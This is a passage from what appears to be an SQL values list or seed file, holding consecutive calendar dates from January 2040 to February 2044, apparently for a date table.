('2040-01-16'),
('2040-01-17'),
('2040-01-18'),
('2040-01-19'),
('2040-01-20'),
('2040-01-21'),
('2040-01-22'),
('2040-01-23'),
('2040-01-24'),
('2040-01-25'),
('2040-01-26'),
('2040-01-27'),
('2040-01-28'),
('2040-01-29'),
('2040-01-30'),
('2040-01-31'),
('2040-02-01'),
('2040-02-02'),
('2040-02-03'),
('2040-02-04'),
('2040-02-05'),
('2040-02-06'),
('2040-02-07'),
('2040-02-08'),
('2040-02-09'),
('2040-02-10'),
('2040-02-11'),
('2040-02-12'),
('2040-02-13'),
('2040-02-14'),
('2040-02-15'),
('2040-02-16'),
('2040-02-17'),
('2040-02-18'),
('2040-02-19'),
('2040-02-20'),
('2040-02-21'),
('2040-02-22'),
('2040-02-23'),
('2040-02-24'),
('2040-02-25'),
('2040-02-26'),
('2040-02-27'),
('2040-02-28'),
('2040-02-29'),
('2040-03-01'),
('2040-03-02'),
('2040-03-03'),
('2040-03-04'),
('2040-03-05'),
('2040-03-06'),
('2040-03-07'),
('2040-03-08'),
('2040-03-09'),
('2040-03-10'),
('2040-03-11'),
('2040-03-12'),
('2040-03-13'),
('2040-03-14'),
('2040-03-15'),
('2040-03-16'),
('2040-03-17'),
('2040-03-18'),
('2040-03-19'),
('2040-03-20'),
('2040-03-21'),
('2040-03-22'),
('2040-03-23'),
('2040-03-24'),
('2040-03-25'),
('2040-03-26'),
('2040-03-27'),
('2040-03-28'),
('2040-03-29'),
('2040-03-30'),
('2040-03-31'),
('2040-04-01'),
('2040-04-02'),
('2040-04-03'),
('2040-04-04'),
('2040-04-05'),
('2040-04-06'),
('2040-04-07'),
('2040-04-08'),
('2040-04-09'),
('2040-04-10'),
('2040-04-11'),
('2040-04-12'),
('2040-04-13'),
('2040-04-14'),
('2040-04-15'),
('2040-04-16'),
('2040-04-17'),
('2040-04-18'),
('2040-04-19'),
('2040-04-20'),
('2040-04-21'),
('2040-04-22'),
('2040-04-23'),
('2040-04-24'),
('2040-04-25'),
('2040-04-26'),
('2040-04-27'),
('2040-04-28'),
('2040-04-29'),
('2040-04-30'),
('2040-05-01'),
('2040-05-02'),
('2040-05-03'),
('2040-05-04'),
('2040-05-05'),
('2040-05-06'),
('2040-05-07'),
('2040-05-08'),
('2040-05-09'),
('2040-05-10'),
('2040-05-11'),
('2040-05-12'),
('2040-05-13'),
('2040-05-14'),
('2040-05-15'),
('2040-05-16'),
('2040-05-17'),
('2040-05-18'),
('2040-05-19'),
('2040-05-20'),
('2040-05-21'),
('2040-05-22'),
('2040-05-23'),
('2040-05-24'),
('2040-05-25'),
('2040-05-26'),
('2040-05-27'),
('2040-05-28'),
('2040-05-29'),
('2040-05-30'),
('2040-05-31'),
('2040-06-01'),
('2040-06-02'),
('2040-06-03'),
('2040-06-04'),
('2040-06-05'),
('2040-06-06'),
('2040-06-07'),
('2040-06-08'),
('2040-06-09'),
('2040-06-10'),
('2040-06-11'),
('2040-06-12'),
('2040-06-13'),
('2040-06-14'),
('2040-06-15'),
('2040-06-16'),
('2040-06-17'),
('2040-06-18'),
('2040-06-19'),
('2040-06-20'),
('2040-06-21'),
('2040-06-22'),
('2040-06-23'),
('2040-06-24'),
('2040-06-25'),
('2040-06-26'),
('2040-06-27'),
('2040-06-28'),
('2040-06-29'),
('2040-06-30'),
('2040-07-01'),
('2040-07-02'),
('2040-07-03'),
('2040-07-04'),
('2040-07-05'),
('2040-07-06'),
('2040-07-07'),
('2040-07-08'),
('2040-07-09'),
('2040-07-10'),
('2040-07-11'),
('2040-07-12'),
('2040-07-13'),
('2040-07-14'),
('2040-07-15'),
('2040-07-16'),
('2040-07-17'),
('2040-07-18'),
('2040-07-19'),
('2040-07-20'),
('2040-07-21'),
('2040-07-22'),
('2040-07-23'),
('2040-07-24'),
('2040-07-25'),
('2040-07-26'),
('2040-07-27'),
('2040-07-28'),
('2040-07-29'),
('2040-07-30'),
('2040-07-31'),
('2040-08-01'),
('2040-08-02'),
('2040-08-03'),
('2040-08-04'),
('2040-08-05'),
('2040-08-06'),
('2040-08-07'),
('2040-08-08'),
('2040-08-09'),
('2040-08-10'),
('2040-08-11'),
('2040-08-12'),
('2040-08-13'),
('2040-08-14'),
('2040-08-15'),
('2040-08-16'),
('2040-08-17'),
('2040-08-18'),
('2040-08-19'),
('2040-08-20'),
('2040-08-21'),
('2040-08-22'),
('2040-08-23'),
('2040-08-24'),
('2040-08-25'),
('2040-08-26'),
('2040-08-27'),
('2040-08-28'),
('2040-08-29'),
('2040-08-30'),
('2040-08-31'),
('2040-09-01'),
('2040-09-02'),
('2040-09-03'),
('2040-09-04'),
('2040-09-05'),
('2040-09-06'),
('2040-09-07'),
('2040-09-08'),
('2040-09-09'),
('2040-09-10'),
('2040-09-11'),
('2040-09-12'),
('2040-09-13'),
('2040-09-14'),
('2040-09-15'),
('2040-09-16'),
('2040-09-17'),
('2040-09-18'),
('2040-09-19'),
('2040-09-20'),
('2040-09-21'),
('2040-09-22'),
('2040-09-23'),
('2040-09-24'),
('2040-09-25'),
('2040-09-26'),
('2040-09-27'),
('2040-09-28'),
('2040-09-29'),
('2040-09-30'),
('2040-10-01'),
('2040-10-02'),
('2040-10-03'),
('2040-10-04'),
('2040-10-05'),
('2040-10-06'),
('2040-10-07'),
('2040-10-08'),
('2040-10-09'),
('2040-10-10'),
('2040-10-11'),
('2040-10-12'),
('2040-10-13'),
('2040-10-14'),
('2040-10-15'),
('2040-10-16'),
('2040-10-17'),
('2040-10-18'),
('2040-10-19'),
('2040-10-20'),
('2040-10-21'),
('2040-10-22'),
('2040-10-23'),
('2040-10-24'),
('2040-10-25'),
('2040-10-26'),
('2040-10-27'),
('2040-10-28'),
('2040-10-29'),
('2040-10-30'),
('2040-10-31'),
('2040-11-01'),
('2040-11-02'),
('2040-11-03'),
('2040-11-04'),
('2040-11-05'),
('2040-11-06'),
('2040-11-07'),
('2040-11-08'),
('2040-11-09'),
('2040-11-10'),
('2040-11-11'),
('2040-11-12'),
('2040-11-13'),
('2040-11-14'),
('2040-11-15'),
('2040-11-16'),
('2040-11-17'),
('2040-11-18'),
('2040-11-19'),
('2040-11-20'),
('2040-11-21'),
('2040-11-22'),
('2040-11-23'),
('2040-11-24'),
('2040-11-25'),
('2040-11-26'),
('2040-11-27'),
('2040-11-28'),
('2040-11-29'),
('2040-11-30'),
('2040-12-01'),
('2040-12-02'),
('2040-12-03'),
('2040-12-04'),
('2040-12-05'),
('2040-12-06'),
('2040-12-07'),
('2040-12-08'),
('2040-12-09'),
('2040-12-10'),
('2040-12-11'),
('2040-12-12'),
('2040-12-13'),
('2040-12-14'),
('2040-12-15'),
('2040-12-16'),
('2040-12-17'),
('2040-12-18'),
('2040-12-19'),
('2040-12-20'),
('2040-12-21'),
('2040-12-22'),
('2040-12-23'),
('2040-12-24'),
('2040-12-25'),
('2040-12-26'),
('2040-12-27'),
('2040-12-28'),
('2040-12-29'),
('2040-12-30'),
('2040-12-31'),
('2041-01-01'),
('2041-01-02'),
('2041-01-03'),
('2041-01-04'),
('2041-01-05'),
('2041-01-06'),
('2041-01-07'),
('2041-01-08'),
('2041-01-09'),
('2041-01-10'),
('2041-01-11'),
('2041-01-12'),
('2041-01-13'),
('2041-01-14'),
('2041-01-15'),
('2041-01-16'),
('2041-01-17'),
('2041-01-18'),
('2041-01-19'),
('2041-01-20'),
('2041-01-21'),
('2041-01-22'),
('2041-01-23'),
('2041-01-24'),
('2041-01-25'),
('2041-01-26'),
('2041-01-27'),
('2041-01-28'),
('2041-01-29'),
('2041-01-30'),
('2041-01-31'),
('2041-02-01'),
('2041-02-02'),
('2041-02-03'),
('2041-02-04'),
('2041-02-05'),
('2041-02-06'),
('2041-02-07'),
('2041-02-08'),
('2041-02-09'),
('2041-02-10'),
('2041-02-11'),
('2041-02-12'),
('2041-02-13'),
('2041-02-14'),
('2041-02-15'),
('2041-02-16'),
('2041-02-17'),
('2041-02-18'),
('2041-02-19'),
('2041-02-20'),
('2041-02-21'),
('2041-02-22'),
('2041-02-23'),
('2041-02-24'),
('2041-02-25'),
('2041-02-26'),
('2041-02-27'),
('2041-02-28'),
('2041-03-01'),
('2041-03-02'),
('2041-03-03'),
('2041-03-04'),
('2041-03-05'),
('2041-03-06'),
('2041-03-07'),
('2041-03-08'),
('2041-03-09'),
('2041-03-10'),
('2041-03-11'),
('2041-03-12'),
('2041-03-13'),
('2041-03-14'),
('2041-03-15'),
('2041-03-16'),
('2041-03-17'),
('2041-03-18'),
('2041-03-19'),
('2041-03-20'),
('2041-03-21'),
('2041-03-22'),
('2041-03-23'),
('2041-03-24'),
('2041-03-25'),
('2041-03-26'),
('2041-03-27'),
('2041-03-28'),
('2041-03-29'),
('2041-03-30'),
('2041-03-31'),
('2041-04-01'),
('2041-04-02'),
('2041-04-03'),
('2041-04-04'),
('2041-04-05'),
('2041-04-06'),
('2041-04-07'),
('2041-04-08'),
('2041-04-09'),
('2041-04-10'),
('2041-04-11'),
('2041-04-12'),
('2041-04-13'),
('2041-04-14'),
('2041-04-15'),
('2041-04-16'),
('2041-04-17'),
('2041-04-18'),
('2041-04-19'),
('2041-04-20'),
('2041-04-21'),
('2041-04-22'),
('2041-04-23'),
('2041-04-24'),
('2041-04-25'),
('2041-04-26'),
('2041-04-27'),
('2041-04-28'),
('2041-04-29'),
('2041-04-30'),
('2041-05-01'),
('2041-05-02'),
('2041-05-03'),
('2041-05-04'),
('2041-05-05'),
('2041-05-06'),
('2041-05-07'),
('2041-05-08'),
('2041-05-09'),
('2041-05-10'),
('2041-05-11'),
('2041-05-12'),
('2041-05-13'),
('2041-05-14'),
('2041-05-15'),
('2041-05-16'),
('2041-05-17'),
('2041-05-18'),
('2041-05-19'),
('2041-05-20'),
('2041-05-21'),
('2041-05-22'),
('2041-05-23'),
('2041-05-24'),
('2041-05-25'),
('2041-05-26'),
('2041-05-27'),
('2041-05-28'),
('2041-05-29'),
('2041-05-30'),
('2041-05-31'),
('2041-06-01'),
('2041-06-02'),
('2041-06-03'),
('2041-06-04'),
('2041-06-05'),
('2041-06-06'),
('2041-06-07'),
('2041-06-08'),
('2041-06-09'),
('2041-06-10'),
('2041-06-11'),
('2041-06-12'),
('2041-06-13'),
('2041-06-14'),
('2041-06-15'),
('2041-06-16'),
('2041-06-17'),
('2041-06-18'),
('2041-06-19'),
('2041-06-20'),
('2041-06-21'),
('2041-06-22'),
('2041-06-23'),
('2041-06-24'),
('2041-06-25'),
('2041-06-26'),
('2041-06-27'),
('2041-06-28'),
('2041-06-29'),
('2041-06-30'),
('2041-07-01'),
('2041-07-02'),
('2041-07-03'),
('2041-07-04'),
('2041-07-05'),
('2041-07-06'),
('2041-07-07'),
('2041-07-08'),
('2041-07-09'),
('2041-07-10'),
('2041-07-11'),
('2041-07-12'),
('2041-07-13'),
('2041-07-14'),
('2041-07-15'),
('2041-07-16'),
('2041-07-17'),
('2041-07-18'),
('2041-07-19'),
('2041-07-20'),
('2041-07-21'),
('2041-07-22'),
('2041-07-23'),
('2041-07-24'),
('2041-07-25'),
('2041-07-26'),
('2041-07-27'),
('2041-07-28'),
('2041-07-29'),
('2041-07-30'),
('2041-07-31'),
('2041-08-01'),
('2041-08-02'),
('2041-08-03'),
('2041-08-04'),
('2041-08-05'),
('2041-08-06'),
('2041-08-07'),
('2041-08-08'),
('2041-08-09'),
('2041-08-10'),
('2041-08-11'),
('2041-08-12'),
('2041-08-13'),
('2041-08-14'),
('2041-08-15'),
('2041-08-16'),
('2041-08-17'),
('2041-08-18'),
('2041-08-19'),
('2041-08-20'),
('2041-08-21'),
('2041-08-22'),
('2041-08-23'),
('2041-08-24'),
('2041-08-25'),
('2041-08-26'),
('2041-08-27'),
('2041-08-28'),
('2041-08-29'),
('2041-08-30'),
('2041-08-31'),
('2041-09-01'),
('2041-09-02'),
('2041-09-03'),
('2041-09-04'),
('2041-09-05'),
('2041-09-06'),
('2041-09-07'),
('2041-09-08'),
('2041-09-09'),
('2041-09-10'),
('2041-09-11'),
('2041-09-12'),
('2041-09-13'),
('2041-09-14'),
('2041-09-15'),
('2041-09-16'),
('2041-09-17'),
('2041-09-18'),
('2041-09-19'),
('2041-09-20'),
('2041-09-21'),
('2041-09-22'),
('2041-09-23'),
('2041-09-24'),
('2041-09-25'),
('2041-09-26'),
('2041-09-27'),
('2041-09-28'),
('2041-09-29'),
('2041-09-30'),
('2041-10-01'),
('2041-10-02'),
('2041-10-03'),
('2041-10-04'),
('2041-10-05'),
('2041-10-06'),
('2041-10-07'),
('2041-10-08'),
('2041-10-09'),
('2041-10-10'),
('2041-10-11'),
('2041-10-12'),
('2041-10-13'),
('2041-10-14'),
('2041-10-15'),
('2041-10-16'),
('2041-10-17'),
('2041-10-18'),
('2041-10-19'),
('2041-10-20'),
('2041-10-21'),
('2041-10-22'),
('2041-10-23'),
('2041-10-24'),
('2041-10-25'),
('2041-10-26'),
('2041-10-27'),
('2041-10-28'),
('2041-10-29'),
('2041-10-30'),
('2041-10-31'),
('2041-11-01'),
('2041-11-02'),
('2041-11-03'),
('2041-11-04'),
('2041-11-05'),
('2041-11-06'),
('2041-11-07'),
('2041-11-08'),
('2041-11-09'),
('2041-11-10'),
('2041-11-11'),
('2041-11-12'),
('2041-11-13'),
('2041-11-14'),
('2041-11-15'),
('2041-11-16'),
('2041-11-17'),
('2041-11-18'),
('2041-11-19'),
('2041-11-20'),
('2041-11-21'),
('2041-11-22'),
('2041-11-23'),
('2041-11-24'),
('2041-11-25'),
('2041-11-26'),
('2041-11-27'),
('2041-11-28'),
('2041-11-29'),
('2041-11-30'),
('2041-12-01'),
('2041-12-02'),
('2041-12-03'),
('2041-12-04'),
('2041-12-05'),
('2041-12-06'),
('2041-12-07'),
('2041-12-08'),
('2041-12-09'),
('2041-12-10'),
('2041-12-11'),
('2041-12-12'),
('2041-12-13'),
('2041-12-14'),
('2041-12-15'),
('2041-12-16'),
('2041-12-17'),
('2041-12-18'),
('2041-12-19'),
('2041-12-20'),
('2041-12-21'),
('2041-12-22'),
('2041-12-23'),
('2041-12-24'),
('2041-12-25'),
('2041-12-26'),
('2041-12-27'),
('2041-12-28'),
('2041-12-29'),
('2041-12-30'),
('2041-12-31'),
('2042-01-01'),
('2042-01-02'),
('2042-01-03'),
('2042-01-04'),
('2042-01-05'),
('2042-01-06'),
('2042-01-07'),
('2042-01-08'),
('2042-01-09'),
('2042-01-10'),
('2042-01-11'),
('2042-01-12'),
('2042-01-13'),
('2042-01-14'),
('2042-01-15'),
('2042-01-16'),
('2042-01-17'),
('2042-01-18'),
('2042-01-19'),
('2042-01-20'),
('2042-01-21'),
('2042-01-22'),
('2042-01-23'),
('2042-01-24'),
('2042-01-25'),
('2042-01-26'),
('2042-01-27'),
('2042-01-28'),
('2042-01-29'),
('2042-01-30'),
('2042-01-31'),
('2042-02-01'),
('2042-02-02'),
('2042-02-03'),
('2042-02-04'),
('2042-02-05'),
('2042-02-06'),
('2042-02-07'),
('2042-02-08'),
('2042-02-09'),
('2042-02-10'),
('2042-02-11'),
('2042-02-12'),
('2042-02-13'),
('2042-02-14'),
('2042-02-15'),
('2042-02-16'),
('2042-02-17'),
('2042-02-18'),
('2042-02-19'),
('2042-02-20'),
('2042-02-21'),
('2042-02-22'),
('2042-02-23'),
('2042-02-24'),
('2042-02-25'),
('2042-02-26'),
('2042-02-27'),
('2042-02-28'),
('2042-03-01'),
('2042-03-02'),
('2042-03-03'),
('2042-03-04'),
('2042-03-05'),
('2042-03-06'),
('2042-03-07'),
('2042-03-08'),
('2042-03-09'),
('2042-03-10'),
('2042-03-11'),
('2042-03-12'),
('2042-03-13'),
('2042-03-14'),
('2042-03-15'),
('2042-03-16'),
('2042-03-17'),
('2042-03-18'),
('2042-03-19'),
('2042-03-20'),
('2042-03-21'),
('2042-03-22'),
('2042-03-23'),
('2042-03-24'),
('2042-03-25'),
('2042-03-26'),
('2042-03-27'),
('2042-03-28'),
('2042-03-29'),
('2042-03-30'),
('2042-03-31'),
('2042-04-01'),
('2042-04-02'),
('2042-04-03'),
('2042-04-04'),
('2042-04-05'),
('2042-04-06'),
('2042-04-07'),
('2042-04-08'),
('2042-04-09'),
('2042-04-10'),
('2042-04-11'),
('2042-04-12'),
('2042-04-13'),
('2042-04-14'),
('2042-04-15'),
('2042-04-16'),
('2042-04-17'),
('2042-04-18'),
('2042-04-19'),
('2042-04-20'),
('2042-04-21'),
('2042-04-22'),
('2042-04-23'),
('2042-04-24'),
('2042-04-25'),
('2042-04-26'),
('2042-04-27'),
('2042-04-28'),
('2042-04-29'),
('2042-04-30'),
('2042-05-01'),
('2042-05-02'),
('2042-05-03'),
('2042-05-04'),
('2042-05-05'),
('2042-05-06'),
('2042-05-07'),
('2042-05-08'),
('2042-05-09'),
('2042-05-10'),
('2042-05-11'),
('2042-05-12'),
('2042-05-13'),
('2042-05-14'),
('2042-05-15'),
('2042-05-16'),
('2042-05-17'),
('2042-05-18'),
('2042-05-19'),
('2042-05-20'),
('2042-05-21'),
('2042-05-22'),
('2042-05-23'),
('2042-05-24'),
('2042-05-25'),
('2042-05-26'),
('2042-05-27'),
('2042-05-28'),
('2042-05-29'),
('2042-05-30'),
('2042-05-31'),
('2042-06-01'),
('2042-06-02'),
('2042-06-03'),
('2042-06-04'),
('2042-06-05'),
('2042-06-06'),
('2042-06-07'),
('2042-06-08'),
('2042-06-09'),
('2042-06-10'),
('2042-06-11'),
('2042-06-12'),
('2042-06-13'),
('2042-06-14'),
('2042-06-15'),
('2042-06-16'),
('2042-06-17'),
('2042-06-18'),
('2042-06-19'),
('2042-06-20'),
('2042-06-21'),
('2042-06-22'),
('2042-06-23'),
('2042-06-24'),
('2042-06-25'),
('2042-06-26'),
('2042-06-27'),
('2042-06-28'),
('2042-06-29'),
('2042-06-30'),
('2042-07-01'),
('2042-07-02'),
('2042-07-03'),
('2042-07-04'),
('2042-07-05'),
('2042-07-06'),
('2042-07-07'),
('2042-07-08'),
('2042-07-09'),
('2042-07-10'),
('2042-07-11'),
('2042-07-12'),
('2042-07-13'),
('2042-07-14'),
('2042-07-15'),
('2042-07-16'),
('2042-07-17'),
('2042-07-18'),
('2042-07-19'),
('2042-07-20'),
('2042-07-21'),
('2042-07-22'),
('2042-07-23'),
('2042-07-24'),
('2042-07-25'),
('2042-07-26'),
('2042-07-27'),
('2042-07-28'),
('2042-07-29'),
('2042-07-30'),
('2042-07-31'),
('2042-08-01'),
('2042-08-02'),
('2042-08-03'),
('2042-08-04'),
('2042-08-05'),
('2042-08-06'),
('2042-08-07'),
('2042-08-08'),
('2042-08-09'),
('2042-08-10'),
('2042-08-11'),
('2042-08-12'),
('2042-08-13'),
('2042-08-14'),
('2042-08-15'),
('2042-08-16'),
('2042-08-17'),
('2042-08-18'),
('2042-08-19'),
('2042-08-20'),
('2042-08-21'),
('2042-08-22'),
('2042-08-23'),
('2042-08-24'),
('2042-08-25'),
('2042-08-26'),
('2042-08-27'),
('2042-08-28'),
('2042-08-29'),
('2042-08-30'),
('2042-08-31'),
('2042-09-01'),
('2042-09-02'),
('2042-09-03'),
('2042-09-04'),
('2042-09-05'),
('2042-09-06'),
('2042-09-07'),
('2042-09-08'),
('2042-09-09'),
('2042-09-10'),
('2042-09-11'),
('2042-09-12'),
('2042-09-13'),
('2042-09-14'),
('2042-09-15'),
('2042-09-16'),
('2042-09-17'),
('2042-09-18'),
('2042-09-19'),
('2042-09-20'),
('2042-09-21'),
('2042-09-22'),
('2042-09-23'),
('2042-09-24'),
('2042-09-25'),
('2042-09-26'),
('2042-09-27'),
('2042-09-28'),
('2042-09-29'),
('2042-09-30'),
('2042-10-01'),
('2042-10-02'),
('2042-10-03'),
('2042-10-04'),
('2042-10-05'),
('2042-10-06'),
('2042-10-07'),
('2042-10-08'),
('2042-10-09'),
('2042-10-10'),
('2042-10-11'),
('2042-10-12'),
('2042-10-13'),
('2042-10-14'),
('2042-10-15'),
('2042-10-16'),
('2042-10-17'),
('2042-10-18'),
('2042-10-19'),
('2042-10-20'),
('2042-10-21'),
('2042-10-22'),
('2042-10-23'),
('2042-10-24'),
('2042-10-25'),
('2042-10-26'),
('2042-10-27'),
('2042-10-28'),
('2042-10-29'),
('2042-10-30'),
('2042-10-31'),
('2042-11-01'),
('2042-11-02'),
('2042-11-03'),
('2042-11-04'),
('2042-11-05'),
('2042-11-06'),
('2042-11-07'),
('2042-11-08'),
('2042-11-09'),
('2042-11-10'),
('2042-11-11'),
('2042-11-12'),
('2042-11-13'),
('2042-11-14'),
('2042-11-15'),
('2042-11-16'),
('2042-11-17'),
('2042-11-18'),
('2042-11-19'),
('2042-11-20'),
('2042-11-21'),
('2042-11-22'),
('2042-11-23'),
('2042-11-24'),
('2042-11-25'),
('2042-11-26'),
('2042-11-27'),
('2042-11-28'),
('2042-11-29'),
('2042-11-30'),
('2042-12-01'),
('2042-12-02'),
('2042-12-03'),
('2042-12-04'),
('2042-12-05'),
('2042-12-06'),
('2042-12-07'),
('2042-12-08'),
('2042-12-09'),
('2042-12-10'),
('2042-12-11'),
('2042-12-12'),
('2042-12-13'),
('2042-12-14'),
('2042-12-15'),
('2042-12-16'),
('2042-12-17'),
('2042-12-18'),
('2042-12-19'),
('2042-12-20'),
('2042-12-21'),
('2042-12-22'),
('2042-12-23'),
('2042-12-24'),
('2042-12-25'),
('2042-12-26'),
('2042-12-27'),
('2042-12-28'),
('2042-12-29'),
('2042-12-30'),
('2042-12-31'),
('2043-01-01'),
('2043-01-02'),
('2043-01-03'),
('2043-01-04'),
('2043-01-05'),
('2043-01-06'),
('2043-01-07'),
('2043-01-08'),
('2043-01-09'),
('2043-01-10'),
('2043-01-11'),
('2043-01-12'),
('2043-01-13'),
('2043-01-14'),
('2043-01-15'),
('2043-01-16'),
('2043-01-17'),
('2043-01-18'),
('2043-01-19'),
('2043-01-20'),
('2043-01-21'),
('2043-01-22'),
('2043-01-23'),
('2043-01-24'),
('2043-01-25'),
('2043-01-26'),
('2043-01-27'),
('2043-01-28'),
('2043-01-29'),
('2043-01-30'),
('2043-01-31'),
('2043-02-01'),
('2043-02-02'),
('2043-02-03'),
('2043-02-04'),
('2043-02-05'),
('2043-02-06'),
('2043-02-07'),
('2043-02-08'),
('2043-02-09'),
('2043-02-10'),
('2043-02-11'),
('2043-02-12'),
('2043-02-13'),
('2043-02-14'),
('2043-02-15'),
('2043-02-16'),
('2043-02-17'),
('2043-02-18'),
('2043-02-19'),
('2043-02-20'),
('2043-02-21'),
('2043-02-22'),
('2043-02-23'),
('2043-02-24'),
('2043-02-25'),
('2043-02-26'),
('2043-02-27'),
('2043-02-28'),
('2043-03-01'),
('2043-03-02'),
('2043-03-03'),
('2043-03-04'),
('2043-03-05'),
('2043-03-06'),
('2043-03-07'),
('2043-03-08'),
('2043-03-09'),
('2043-03-10'),
('2043-03-11'),
('2043-03-12'),
('2043-03-13'),
('2043-03-14'),
('2043-03-15'),
('2043-03-16'),
('2043-03-17'),
('2043-03-18'),
('2043-03-19'),
('2043-03-20'),
('2043-03-21'),
('2043-03-22'),
('2043-03-23'),
('2043-03-24'),
('2043-03-25'),
('2043-03-26'),
('2043-03-27'),
('2043-03-28'),
('2043-03-29'),
('2043-03-30'),
('2043-03-31'),
('2043-04-01'),
('2043-04-02'),
('2043-04-03'),
('2043-04-04'),
('2043-04-05'),
('2043-04-06'),
('2043-04-07'),
('2043-04-08'),
('2043-04-09'),
('2043-04-10'),
('2043-04-11'),
('2043-04-12'),
('2043-04-13'),
('2043-04-14'),
('2043-04-15'),
('2043-04-16'),
('2043-04-17'),
('2043-04-18'),
('2043-04-19'),
('2043-04-20'),
('2043-04-21'),
('2043-04-22'),
('2043-04-23'),
('2043-04-24'),
('2043-04-25'),
('2043-04-26'),
('2043-04-27'),
('2043-04-28'),
('2043-04-29'),
('2043-04-30'),
('2043-05-01'),
('2043-05-02'),
('2043-05-03'),
('2043-05-04'),
('2043-05-05'),
('2043-05-06'),
('2043-05-07'),
('2043-05-08'),
('2043-05-09'),
('2043-05-10'),
('2043-05-11'),
('2043-05-12'),
('2043-05-13'),
('2043-05-14'),
('2043-05-15'),
('2043-05-16'),
('2043-05-17'),
('2043-05-18'),
('2043-05-19'),
('2043-05-20'),
('2043-05-21'),
('2043-05-22'),
('2043-05-23'),
('2043-05-24'),
('2043-05-25'),
('2043-05-26'),
('2043-05-27'),
('2043-05-28'),
('2043-05-29'),
('2043-05-30'),
('2043-05-31'),
('2043-06-01'),
('2043-06-02'),
('2043-06-03'),
('2043-06-04'),
('2043-06-05'),
('2043-06-06'),
('2043-06-07'),
('2043-06-08'),
('2043-06-09'),
('2043-06-10'),
('2043-06-11'),
('2043-06-12'),
('2043-06-13'),
('2043-06-14'),
('2043-06-15'),
('2043-06-16'),
('2043-06-17'),
('2043-06-18'),
('2043-06-19'),
('2043-06-20'),
('2043-06-21'),
('2043-06-22'),
('2043-06-23'),
('2043-06-24'),
('2043-06-25'),
('2043-06-26'),
('2043-06-27'),
('2043-06-28'),
('2043-06-29'),
('2043-06-30'),
('2043-07-01'),
('2043-07-02'),
('2043-07-03'),
('2043-07-04'),
('2043-07-05'),
('2043-07-06'),
('2043-07-07'),
('2043-07-08'),
('2043-07-09'),
('2043-07-10'),
('2043-07-11'),
('2043-07-12'),
('2043-07-13'),
('2043-07-14'),
('2043-07-15'),
('2043-07-16'),
('2043-07-17'),
('2043-07-18'),
('2043-07-19'),
('2043-07-20'),
('2043-07-21'),
('2043-07-22'),
('2043-07-23'),
('2043-07-24'),
('2043-07-25'),
('2043-07-26'),
('2043-07-27'),
('2043-07-28'),
('2043-07-29'),
('2043-07-30'),
('2043-07-31'),
('2043-08-01'),
('2043-08-02'),
('2043-08-03'),
('2043-08-04'),
('2043-08-05'),
('2043-08-06'),
('2043-08-07'),
('2043-08-08'),
('2043-08-09'),
('2043-08-10'),
('2043-08-11'),
('2043-08-12'),
('2043-08-13'),
('2043-08-14'),
('2043-08-15'),
('2043-08-16'),
('2043-08-17'),
('2043-08-18'),
('2043-08-19'),
('2043-08-20'),
('2043-08-21'),
('2043-08-22'),
('2043-08-23'),
('2043-08-24'),
('2043-08-25'),
('2043-08-26'),
('2043-08-27'),
('2043-08-28'),
('2043-08-29'),
('2043-08-30'),
('2043-08-31'),
('2043-09-01'),
('2043-09-02'),
('2043-09-03'),
('2043-09-04'),
('2043-09-05'),
('2043-09-06'),
('2043-09-07'),
('2043-09-08'),
('2043-09-09'),
('2043-09-10'),
('2043-09-11'),
('2043-09-12'),
('2043-09-13'),
('2043-09-14'),
('2043-09-15'),
('2043-09-16'),
('2043-09-17'),
('2043-09-18'),
('2043-09-19'),
('2043-09-20'),
('2043-09-21'),
('2043-09-22'),
('2043-09-23'),
('2043-09-24'),
('2043-09-25'),
('2043-09-26'),
('2043-09-27'),
('2043-09-28'),
('2043-09-29'),
('2043-09-30'),
('2043-10-01'),
('2043-10-02'),
('2043-10-03'),
('2043-10-04'),
('2043-10-05'),
('2043-10-06'),
('2043-10-07'),
('2043-10-08'),
('2043-10-09'),
('2043-10-10'),
('2043-10-11'),
('2043-10-12'),
('2043-10-13'),
('2043-10-14'),
('2043-10-15'),
('2043-10-16'),
('2043-10-17'),
('2043-10-18'),
('2043-10-19'),
('2043-10-20'),
('2043-10-21'),
('2043-10-22'),
('2043-10-23'),
('2043-10-24'),
('2043-10-25'),
('2043-10-26'),
('2043-10-27'),
('2043-10-28'),
('2043-10-29'),
('2043-10-30'),
('2043-10-31'),
('2043-11-01'),
('2043-11-02'),
('2043-11-03'),
('2043-11-04'),
('2043-11-05'),
('2043-11-06'),
('2043-11-07'),
('2043-11-08'),
('2043-11-09'),
('2043-11-10'),
('2043-11-11'),
('2043-11-12'),
('2043-11-13'),
('2043-11-14'),
('2043-11-15'),
('2043-11-16'),
('2043-11-17'),
('2043-11-18'),
('2043-11-19'),
('2043-11-20'),
('2043-11-21'),
('2043-11-22'),
('2043-11-23'),
('2043-11-24'),
('2043-11-25'),
('2043-11-26'),
('2043-11-27'),
('2043-11-28'),
('2043-11-29'),
('2043-11-30'),
('2043-12-01'),
('2043-12-02'),
('2043-12-03'),
('2043-12-04'),
('2043-12-05'),
('2043-12-06'),
('2043-12-07'),
('2043-12-08'),
('2043-12-09'),
('2043-12-10'),
('2043-12-11'),
('2043-12-12'),
('2043-12-13'),
('2043-12-14'),
('2043-12-15'),
('2043-12-16'),
('2043-12-17'),
('2043-12-18'),
('2043-12-19'),
('2043-12-20'),
('2043-12-21'),
('2043-12-22'),
('2043-12-23'),
('2043-12-24'),
('2043-12-25'),
('2043-12-26'),
('2043-12-27'),
('2043-12-28'),
('2043-12-29'),
('2043-12-30'),
('2043-12-31'),
('2044-01-01'),
('2044-01-02'),
('2044-01-03'),
('2044-01-04'),
('2044-01-05'),
('2044-01-06'),
('2044-01-07'),
('2044-01-08'),
('2044-01-09'),
('2044-01-10'),
('2044-01-11'),
('2044-01-12'),
('2044-01-13'),
('2044-01-14'),
('2044-01-15'),
('2044-01-16'),
('2044-01-17'),
('2044-01-18'),
('2044-01-19'),
('2044-01-20'),
('2044-01-21'),
('2044-01-22'),
('2044-01-23'),
('2044-01-24'),
('2044-01-25'),
('2044-01-26'),
('2044-01-27'),
('2044-01-28'),
('2044-01-29'),
('2044-01-30'),
('2044-01-31'),
('2044-02-01'),
('2044-02-02'),
('2044-02-03'),
('2044-02-04'),
('2044-02-05'),
('2044-02-06'),
('2044-02-07'),
('2044-02-08'),
('2044-02-09'),
('2044-02-10'),
('2044-02-11'),
('2044-02-12'),
('2044-02-13'),
('2044-02-14'),
('2044-02-15'),
('2044-02-16'),
('2044-02-17'),
('2044-02-18'),
('2044-02-19'),
('2044-02-20'),
('2044-02-21'),
('2044-02-22'),
('2044-02-23'),
